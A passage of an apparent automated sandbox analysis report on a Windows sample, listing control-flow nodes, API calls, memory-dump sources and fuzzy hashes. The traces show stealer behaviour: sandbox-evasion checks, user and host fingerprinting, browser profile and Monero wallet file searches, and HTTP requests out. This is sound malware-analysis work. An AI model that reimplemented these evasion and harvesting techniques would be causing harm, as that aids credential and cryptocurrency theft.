                                    • 1140 fb57dc-fb5844 call fba8a0, call fba820 * 2, call fa1670, call fba800 * 4, call fb6560, call fa1550 -> 1270
                                    • 1143 fb57da-fb585f call fbaad0, StrCmpCA -> 1163, 1164
                                    • 1144 fb56bc-fb56c3 -> 1148, 1149
                                    • 1148 fb571e-fb5793 call fba740 * 2, call fa1590, call fb52c0, call fba8a0, call fba800, call fbaad0, StrCmpCA -> 1143, 1249
                                    • 1149 fb56c5-fb5719 call fba820, call fba7a0, call fa1590, call fb51f0, call fba8a0, call fba800 -> 1143
                                    • 1163 fb5991-fb59f9 call fba8a0, call fba820 * 2, call fa1670, call fba800 * 4, call fb6560, call fa1550 -> 1270
                                    • 1164 fb5865-fb586c -> 1170, 1171
                                    • 1170 fb598f-fb5a14 call fbaad0, StrCmpCA -> 1200, 1201
                                    • 1171 fb5872-fb5879 -> 1179, 1180
                                    • 1179 fb587b-fb58ce call fba820, call fba7a0, call fa1590, call fb51f0, call fba8a0, call fba800 -> 1170
                                    • 1180 fb58d3-fb5948 call fba740 * 2, call fa1590, call fb52c0, call fba8a0, call fba800, call fbaad0, StrCmpCA -> 1170, 1275
                                    • 1200 fb5a28-fb5a91 call fba8a0, call fba820 * 2, call fa1670, call fba800 * 4, call fb6560, call fa1550 -> 1270
                                    • 1201 fb5a16-fb5a21 Sleep -> 1106
                                    • 1249 fb5795-fb57d5 call fba7a0, call fa1590, call fb51f0, call fba8a0, call fba800 -> 1143
                                    • 1270 fb5ac3-fb5ac6 (exit)
                                    • 1275 fb594a-fb598a call fba7a0, call fa1590, call fb51f0, call fba8a0, call fba800 -> 1170
                                    APIs
                                      • Part of subcall function 00FBA820: lstrlen.KERNEL32(00FA4F05,?,?,00FA4F05,00FC0DDE), ref: 00FBA82B
                                      • Part of subcall function 00FBA820: lstrcpy.KERNEL32(00FC0DDE,00000000), ref: 00FBA885
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5857
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5228
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5318
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB532F
                                      • Part of subcall function 00FB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FB5364
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB5383
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00FB5A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 4b669c42be69c2a85937136ec4ade365adbd728ef0c43034ff6542d60f67f99a
                                    • Instruction ID: ee733f9323c8b489bdcd31aa18a2a8adca5078bae733cdc44e089858b5d8953f
                                    • Opcode Fuzzy Hash: 4b669c42be69c2a85937136ec4ade365adbd728ef0c43034ff6542d60f67f99a
                                    • Instruction Fuzzy Hash: C1E14371910108AACB18FBE1EC53EED737CAF54700F508128B41667495EF3CAA59EFA2

                                    Control-flow Graph

                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00FB17C5
                                    • ExitProcess.KERNEL32 ref: 00FB17D1
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 660ae4e6e0c42f88e30e9481a708f5b90416ab6eeda65314180cd8134c911723
                                    • Instruction ID: d9860758793c0e80adfd6d45e8ed8d85bf073558e6888b319c38bb420e3e1823
                                    • Opcode Fuzzy Hash: 660ae4e6e0c42f88e30e9481a708f5b90416ab6eeda65314180cd8134c911723
                                    • Instruction Fuzzy Hash: AD5148B5A00209EBCB04DFE2D965BFE77B5BF44704F508068E416AB240DB74E952EF62

                                    Control-flow Graph

                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FB7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FB757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB760A
                                    • wsprintfA.USER32 ref: 00FB7640
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 938f50621c67ce8259f389c7e926734db92c761cc9b230789843d13353917a2d
                                    • Instruction ID: 9f2343de5604f4ffc47ba3d9ffdfe944dc8bfc5150e3d47d1c547e0a5d990963
                                    • Opcode Fuzzy Hash: 938f50621c67ce8259f389c7e926734db92c761cc9b230789843d13353917a2d
                                    • Instruction Fuzzy Hash: 114181B1D04348ABDB24DF95DC55BDEBBB8AF48700F100099F5096B280DB78AA84DFA5

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2170), ref: 00FB98A1
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2320), ref: 00FB98BA
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C22D8), ref: 00FB98D2
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C22F0), ref: 00FB98EA
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2428), ref: 00FB9903
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C91B0), ref: 00FB991B
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B5430), ref: 00FB9933
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B52B0), ref: 00FB994C
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C2458), ref: 00FB9964
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C23F8), ref: 00FB997C
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21A0), ref: 00FB9995
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21B8), ref: 00FB99AD
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008B5450), ref: 00FB99C5
                                      • Part of subcall function 00FB9860: GetProcAddress.KERNEL32(74DD0000,008C21E8), ref: 00FB99DE
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FA11D0: ExitProcess.KERNEL32 ref: 00FA1211
                                      • Part of subcall function 00FA1160: GetSystemInfo.KERNEL32(?), ref: 00FA116A
                                      • Part of subcall function 00FA1160: ExitProcess.KERNEL32 ref: 00FA117E
                                      • Part of subcall function 00FA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FA112B
                                      • Part of subcall function 00FA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FA1132
                                      • Part of subcall function 00FA1110: ExitProcess.KERNEL32 ref: 00FA1143
                                      • Part of subcall function 00FA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FA123E
                                      • Part of subcall function 00FA1220: ExitProcess.KERNEL32 ref: 00FA1294
                                      • Part of subcall function 00FB6770: GetUserDefaultLangID.KERNEL32 ref: 00FB6774
                                      • Part of subcall function 00FA1190: ExitProcess.KERNEL32 ref: 00FA11C6
                                      • Part of subcall function 00FB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                      • Part of subcall function 00FB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                      • Part of subcall function 00FB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                      • Part of subcall function 00FB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                      • Part of subcall function 00FB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                      • Part of subcall function 00FB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FB6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FB6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6B1A
                                    • ExitProcess.KERNEL32 ref: 00FB6B22
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 76bc73b821f26c7815714a826729a4c5e0ff162470d041269ed46bf9c35bf46a
                                    • Instruction ID: d94fe48760f5b8c6de6b38cc70b4cb5206c95284343b4bb85e44306cc832fd57
                                    • Opcode Fuzzy Hash: 76bc73b821f26c7815714a826729a4c5e0ff162470d041269ed46bf9c35bf46a
                                    • Instruction Fuzzy Hash: 8A311E75D40208AAEB14FBF1DC56BEE7778AF44700F504528F212A6182DF7C9945EFA2

                                    Control-flow Graph

                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FB6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FB6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FB6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,008C9210,?,00FC110C,?,00000000,?,00FC1110,?,00000000,00FC0AEF), ref: 00FB6B1A
                                    • ExitProcess.KERNEL32 ref: 00FB6B22
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: bd262922d666cb16050f602cb9a8ab676767e9fa97ab04573501b0895656b195
                                    • Instruction ID: 1381f5c00a461a1adf901ec0a5c8edde504468267ec1743844551405f1a5fa56
                                    • Opcode Fuzzy Hash: bd262922d666cb16050f602cb9a8ab676767e9fa97ab04573501b0895656b195
                                    • Instruction Fuzzy Hash: E4F03A70A40209EAEB10ABE2AC06BFD7B78EF44701F108525B523E6181CBBC5580EF65

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 6cea0bda56de05eaa53e6c97bb6e608d34f448406672bcff7860febae129fefd
                                    • Instruction ID: 3b59389b7ef6e32d5f55733424cbee8193cf784acc2a07e8c5c509c8a57dbc87
                                    • Opcode Fuzzy Hash: 6cea0bda56de05eaa53e6c97bb6e608d34f448406672bcff7860febae129fefd
                                    • Instruction Fuzzy Hash: 2A214FB1D00208ABDF14DFA5E845ADD7B78FF45320F108625F965A72C0DB746A05DF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA6280: InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                      • Part of subcall function 00FA6280: StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                      • Part of subcall function 00FA6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                      • Part of subcall function 00FA6280: HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                      • Part of subcall function 00FA6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                      • Part of subcall function 00FA6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 93036576c10a80020a94258cb01042359b8b17781ecfc74f1bcd083e1d454bd3
                                    • Instruction ID: 5f9455efd88d0de7b68b6d4d450b7a84057bb88efa65bbd4b8eefbe8031c3a55
                                    • Opcode Fuzzy Hash: 93036576c10a80020a94258cb01042359b8b17781ecfc74f1bcd083e1d454bd3
                                    • Instruction Fuzzy Hash: 81112E74900008BBCB14FFA1DD52EED7378AF50300F504158F91A5A592EF38AB15EE92

                                    Control-flow Graph

                                    Basic blocks (node: address range, calls):
                                    • 1493: fa1220-fa1247, call fb89b0, GlobalMemoryStatusEx
                                    • 1496: fa1249-fa1271, call fbda00 * 2
                                    • 1497: fa1273-fa127a
                                    • 1498: fa1281-fa1285
                                    • 1500: fa129a-fa129d
                                    • 1501: fa1287
                                    • 1504: fa1289-fa1290
                                    • 1505: fa1292-fa1294, ExitProcess
                                    Edges: 1493->1496, 1493->1497, 1496->1498, 1497->1498, 1498->1500, 1498->1501, 1501->1504, 1501->1505, 1504->1500, 1504->1505
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FA123E
                                    • ExitProcess.KERNEL32 ref: 00FA1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 1c680c7d7bc014c106f4caf21c6ea18bc916022817e63d7fa5a556d6bbd04f77
                                    • Instruction ID: a84098524aff0f2f50f1cb20dfe9f39966a81d619a90599c5e6984491a6fdefe
                                    • Opcode Fuzzy Hash: 1c680c7d7bc014c106f4caf21c6ea18bc916022817e63d7fa5a556d6bbd04f77
                                    • Instruction Fuzzy Hash: 25014BF4D40308AAEB10DBE0DC49B9EBBB8BB05701F248058E605BA280D67895859B99
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FA112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FA1132
                                    • ExitProcess.KERNEL32 ref: 00FA1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 3df44f3e6012d45d3386bcec818eaf5dc76ef3160fccb789773ec8f9f392e9c6
                                    • Instruction ID: 4696714a57d3d32b8816195dc2fbfedc85f93dcf66efea9f17c945c70adb7bf2
                                    • Opcode Fuzzy Hash: 3df44f3e6012d45d3386bcec818eaf5dc76ef3160fccb789773ec8f9f392e9c6
                                    • Instruction Fuzzy Hash: 6FE0E6B4D95308FFE764ABE0AC0AF097ABCAF05B12F114154F7097B1C4D6B526809799
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FA10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FA10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 3d743421d802eb000b85ef4ffcf2b1bd8f4e550c27a11095e901e4fd3a0a68d3
                                    • Instruction ID: ac9bec530a2d339922b0add7fbf0c0b951d0aa2e5248723ef58cb87df3b9aa83
                                    • Opcode Fuzzy Hash: 3d743421d802eb000b85ef4ffcf2b1bd8f4e550c27a11095e901e4fd3a0a68d3
                                    • Instruction Fuzzy Hash: 1DF0E9B1A41204BBE71496E4AC49FAAB7ECE705B15F304454F504E7280D5715E40DB60
                                    APIs
                                      • Part of subcall function 00FB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7910
                                      • Part of subcall function 00FB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7917
                                      • Part of subcall function 00FB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FB792F
                                      • Part of subcall function 00FB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FA11B7), ref: 00FB7880
                                      • Part of subcall function 00FB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7887
                                      • Part of subcall function 00FB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FB789F
                                    • ExitProcess.KERNEL32 ref: 00FA11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: f56a8c3d32022f961923990b1ec3cb2fe2b35a5575bc852223a12883c228fc27
                                    • Instruction ID: b1e85da93d8cdbc580a78714ede45ad2bc8cc1be715e33d2aeac48daf72d8fe8
                                    • Opcode Fuzzy Hash: f56a8c3d32022f961923990b1ec3cb2fe2b35a5575bc852223a12883c228fc27
                                    • Instruction Fuzzy Hash: D0E012B5D1430163CA1473F2BC0AB6A36DC6F95385F150434FA09D7102FA2DF841EE65
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB38E3
                                    • lstrcat.KERNEL32(?,?), ref: 00FB3935
                                    • StrCmpCA.SHLWAPI(?,00FC0F70), ref: 00FB3947
                                    • StrCmpCA.SHLWAPI(?,00FC0F74), ref: 00FB395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB3C67
                                    • FindClose.KERNEL32(000000FF), ref: 00FB3C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: ce57555c6ab22243723d09dca8cad7823b09013ee4f57e033f75ccff8480d6e4
                                    • Instruction ID: 9868d1ade751ac1211af58de03dec72ac70c36a81474a680ae97110ac352e067
                                    • Opcode Fuzzy Hash: ce57555c6ab22243723d09dca8cad7823b09013ee4f57e033f75ccff8480d6e4
                                    • Instruction Fuzzy Hash: AEA18DB2A40208ABDB34DFA4DC85FEA73BCBF88300F044598A51D96145EB759BC4DF62
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00FC0B32,00FC0B2B,00000000,?,?,?,00FC13F4,00FC0B2A), ref: 00FABEF5
                                    • StrCmpCA.SHLWAPI(?,00FC13F8), ref: 00FABF4D
                                    • StrCmpCA.SHLWAPI(?,00FC13FC), ref: 00FABF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00FAC7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 9525a00c76a27d9fe660abac8db1ee94eada88169dc4d76528f9bd8e8fdd14d3
                                    • Instruction ID: 22999fc783552ac85fb610dfacc4b55ababfad84fd554103977f43b07373dc23
                                    • Opcode Fuzzy Hash: 9525a00c76a27d9fe660abac8db1ee94eada88169dc4d76528f9bd8e8fdd14d3
                                    • Instruction Fuzzy Hash: 05422572910108ABDB14FBB1DD96EED737DAF94300F404568B50A97181EF389B49EFA2
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB4943
                                    • StrCmpCA.SHLWAPI(?,00FC0FDC), ref: 00FB4971
                                    • StrCmpCA.SHLWAPI(?,00FC0FE0), ref: 00FB4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00FB4B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 4ab6c30cce88f4518393de65b432b38b9464cb3d4455c984213a60952bf5d66b
                                    • Instruction ID: 3fc7cafd822016eff3b216d27c90d7484e0563d093071b9535f73d67d9cbb02c
                                    • Opcode Fuzzy Hash: 4ab6c30cce88f4518393de65b432b38b9464cb3d4455c984213a60952bf5d66b
                                    • Instruction Fuzzy Hash: 066152B5900218ABCB24EBE0ED45FEA73BCBF48701F04859CB51996045EB35EB85DF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FB4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4587
                                    • wsprintfA.USER32 ref: 00FB45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB45BD
                                    • StrCmpCA.SHLWAPI(?,00FC0FC4), ref: 00FB45EB
                                    • StrCmpCA.SHLWAPI(?,00FC0FC8), ref: 00FB4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB468B
                                    • FindClose.KERNEL32(000000FF), ref: 00FB46A0
                                    • lstrcat.KERNEL32(?,008CEB18), ref: 00FB46C5
                                    • lstrcat.KERNEL32(?,008CDCA0), ref: 00FB46D8
                                    • lstrlen.KERNEL32(?), ref: 00FB46E5
                                    • lstrlen.KERNEL32(?), ref: 00FB46F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: ce8ce5ecbd2271803afcdb176d4cbba365474c62c37751d0b2d3f957175bb5d1
                                    • Instruction ID: fbbcc11dd60d53751f109d140fde861eac04963294082adf04d124190cb586cd
                                    • Opcode Fuzzy Hash: ce8ce5ecbd2271803afcdb176d4cbba365474c62c37751d0b2d3f957175bb5d1
                                    • Instruction Fuzzy Hash: A35173B5940218ABCB34EBF0EC89FE973BCAF58700F404598B61996084EF749AC5DF91
                                    APIs
                                    • wsprintfA.USER32 ref: 00FB3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FB3EDA
                                    • StrCmpCA.SHLWAPI(?,00FC0FAC), ref: 00FB3F08
                                    • StrCmpCA.SHLWAPI(?,00FC0FB0), ref: 00FB3F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB406C
                                    • FindClose.KERNEL32(000000FF), ref: 00FB4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
